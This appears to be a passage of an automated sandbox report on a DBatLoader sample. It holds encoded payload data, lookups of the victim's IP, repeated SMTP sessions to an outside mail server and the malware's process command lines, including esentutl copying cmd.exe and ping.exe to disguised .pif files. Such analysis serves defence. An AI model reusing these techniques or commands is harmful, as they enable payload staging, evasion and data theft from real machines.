                                                                                                                                                                                                                                                                                                                                                    Data Ascii: H9heqPY6J+lI6PHZ3XYg4w18P5weEGu2tBlEtv7bYvy3ENzVEaaQT4D9IghWZZSjXNtMGxZTJBrwIDQl7x00XPlPNjbzozJ6JNsc5qk2iCy85EP1KRFuH9/BLvlSAk72VxWeMX5TR0+GN4yk2ttbYe3twL6ObsCwVdC3m3FLpR3bMb2W2ObBBxDBUObp+j6XTyCm+RYTWVESkBlfg+qVGPhaitT+j2GEG6j+Ma98wMzB3EyTuPIuZKWJXYHmvFp
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 79 74 67 57 48 53 65 57 32 67 78 75 74 79 44 68 53 32 54 4c 53 57 2b 62 4a 37 69 58 46 47 50 54 7a 49 75 50 32 50 49 59 4a 32 2b 2b 45 58 46 6e 62 75 57 65 70 58 4b 33 62 33 65 37 70 33 72 48 33 74 65 5a 70 6c 51 64 4b 61 2b 62 52 56 70 4f 51 63 6c 47 34 74 47 2f 52 67 2b 59 35 6b 33 76 66 64 67 57 37 6f 36 6d 62 4f 4f 50 49 66 46 65 65 31 62 67 70 6b 55 39 6a 6d 6d 78 6d 44 52 61 59 78 68 43 37 77 69 43 67 68 78 77 4f 7a 30 4f 4b 52 6a 50 4b 73 2f 71 64 55 36 65 57 66 6d 59 6b 70 68 64 74 37 63 62 72 67 74 67 33 54 38 76 49 6a 47 79 2b 34 46 55 6b 4f 4d 69 65 6e 56 6a 46 65 55 78 79 69 38 63 30 36 59 69 33 33 4c 44 31 46 74 53 33 55 37 58 59 6f 67 58 46 34 33 64 78 48 47 43 55 66 31 36 51 5a 74 75 58 44 65 47 45 33 59 70 37 38 63 4b 4b 66 49 57 58 52 71
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ytgWHSeW2gxutyDhS2TLSW+bJ7iXFGPTzIuP2PIYJ2++EXFnbuWepXK3b3e7p3rH3teZplQdKa+bRVpOQclG4tG/Rg+Y5k3vfdgW7o6mbOOPIfFee1bgpkU9jmmxmDRaYxhC7wiCghxwOz0OKRjPKs/qdU6eWfmYkphdt7cbrgtg3T8vIjGy+4FUkOMienVjFeUxyi8c06Yi33LD1FtS3U7XYogXF43dxHGCUf16QZtuXDeGE3Yp78cKKfIWXRq
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 38 77 7a 44 56 31 71 6b 2b 43 49 53 64 32 35 68 57 6a 68 74 6f 45 6b 63 6d 35 32 56 68 54 6e 6f 49 42 6d 30 4e 4a 46 4c 65 74 66 44 33 78 56 73 76 68 6f 55 50 46 2b 52 43 31 6f 58 31 59 35 64 69 62 6a 6c 48 75 4c 65 4d 4e 30 65 2b 2b 31 33 50 6c 32 55 41 50 2f 54 4f 72 61 34 6c 30 67 6a 6d 37 63 46 46 2f 65 53 68 41 63 44 4f 6a 37 30 76 61 37 48 34 73 41 34 46 33 32 36 50 4b 36 64 61 54 67 38 79 30 34 63 64 49 65 43 30 4b 6d 54 44 38 61 48 6e 6d 2f 36 77 68 69 72 68 6f 75 31 6f 2f 4d 6d 57 76 30 76 76 42 77 6c 48 4f 6f 63 6e 68 54 39 54 4e 46 47 68 69 43 52 44 47 4c 62 79 62 45 31 50 68 6f 70 53 52 35 6e 72 76 66 5a 63 35 45 67 6e 50 62 39 65 51 43 77 6e 5a 49 5a 63 68 67 6f 71 52 39 75 4b 6d 4f 4f 34 4c 35 4e 4f 53 4b 54 38 76 34 45 4a 6c 44 50 61 54 51
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8wzDV1qk+CISd25hWjhtoEkcm52VhTnoIBm0NJFLetfD3xVsvhoUPF+RC1oX1Y5dibjlHuLeMN0e++13Pl2UAP/TOra4l0gjm7cFF/eShAcDOj70va7H4sA4F326PK6daTg8y04cdIeC0KmTD8aHnm/6whirhou1o/MmWv0vvBwlHOocnhT9TNFGhiCRDGLbybE1PhopSR5nrvfZc5EgnPb9eQCwnZIZchgoqR9uKmOO4L5NOSKT8v4EJlDPaTQ
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:13 UTC16384INData Raw: 61 74 53 70 4c 30 31 4b 79 55 32 62 4a 46 44 74 6f 41 72 36 47 79 53 45 72 45 79 61 35 71 45 42 49 6c 67 56 50 2f 36 43 63 79 37 67 54 69 6c 62 32 36 4c 64 4c 52 6e 78 77 65 4c 49 42 6f 57 43 71 4e 67 71 77 71 4b 43 36 68 50 65 43 74 2f 65 78 57 48 4b 65 4f 6c 4c 53 4a 7a 37 72 41 73 63 4b 47 68 68 42 6e 53 37 6a 66 44 69 66 33 66 78 54 38 4c 6b 52 57 75 71 70 65 6c 32 43 2f 53 47 49 42 2b 2f 58 59 46 63 33 70 30 56 6a 2f 6d 57 4b 6b 44 5a 32 78 62 6f 34 4f 56 61 48 6b 51 52 31 49 35 4d 47 50 52 6c 58 6b 47 62 45 48 6d 32 52 32 61 6b 52 77 4b 33 6b 71 6c 63 2f 42 66 68 7a 35 65 6b 44 73 6e 58 6e 58 34 30 31 51 55 79 33 4b 6f 47 58 4f 75 78 61 52 4c 46 37 70 74 34 51 35 57 63 62 74 5a 43 69 63 56 76 57 4f 71 4e 59 43 50 6e 53 68 61 34 6d 59 5a 34 78 68 31
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: atSpL01KyU2bJFDtoAr6GySErEya5qEBIlgVP/6Ccy7gTilb26LdLRnxweLIBoWCqNgqwqKC6hPeCt/exWHKeOlLSJz7rAscKGhhBnS7jfDif3fxT8LkRWuqpel2C/SGIB+/XYFc3p0Vj/mWKkDZ2xbo4OVaHkQR1I5MGPRlXkGbEHm2R2akRwK3kqlc/Bfhz5ekDsnXnX401QUy3KoGXOuxaRLF7pt4Q5WcbtZCicVvWOqNYCPnSha4mYZ4xh1


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    1192.168.2.1049759104.26.13.2054433976C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:32 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:32 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:12:32 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 11
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8e88121b1d5f41df-EWR
                                                                                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1887524&cwnd=252&unsent_bytes=0&cid=2088d30b37a11daf&ts=650&x=0"
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:12:32 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8.46.123.75


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    2192.168.2.1049826104.26.13.2054437892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:13:01 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:13:01 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 11
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8e8812cf9fbf43a6-EWR
                                                                                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1689814&cwnd=175&unsent_bytes=0&cid=cc0159779f4dc6ec&ts=450&x=0"
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:13:01 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8.46.123.75


                                                                                                                                                                                                                                                                                                                                                    SMTP Packets

                                                                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.241041899 CET5874977451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:12:38 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.241247892 CET49774587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.654290915 CET5874977451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.654443026 CET49774587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:39.064027071 CET5874977451.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:07.644931078 CET5874984551.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:07 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:07.645417929 CET49845587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:08.057960033 CET5874984551.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:08.058149099 CET49845587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:08.470901012 CET5874984551.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.420069933 CET5874986651.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:14 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.421716928 CET49866587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.843146086 CET5874986651.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.843337059 CET49866587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.261038065 CET5874986651.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:50.843352079 CET5875002551.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:14:50 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.274379015 CET50025587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.674194098 CET5875002551.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.674555063 CET50025587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:52.074881077 CET5875002551.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.643105030 CET5875006351.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:25 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.643810987 CET50063587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.788229942 CET5875006451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:25 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.788388014 CET50064587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.046936989 CET5875006351.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.047126055 CET50063587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.196666956 CET5875006451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.196830988 CET50064587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.450577021 CET5875006351.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.605408907 CET5875006451.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351233959 CET5875008951.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:51 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351413965 CET50089587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758491993 CET5875008951.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758690119 CET50089587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.163511038 CET5875008951.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.669365883 CET5875009251.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:53 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.669509888 CET50092587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.077558994 CET5875009251.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.077864885 CET50092587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.485847950 CET5875009251.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.403992891 CET5875009651.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:57 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.404254913 CET50096587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.807035923 CET5875009651.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.807301998 CET50096587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.210387945 CET5875009651.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.356379032 CET5875011551.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:16:16 +0000
                                                                                                                                                                                                                                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.356547117 CET50115587192.168.2.1051.195.88.199EHLO 179605
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.766685009 CET5875011551.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:16.766840935 CET50115587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:17.177259922 CET5875011551.195.88.199192.168.2.10220 TLS go ahead

                                                                                                                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:07
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\C6dAUcOA6M.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:19
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xd70000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:19
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:19
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                                                                                                                                                                                                                    File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:20
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                                                                                                                                                                                                                    File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
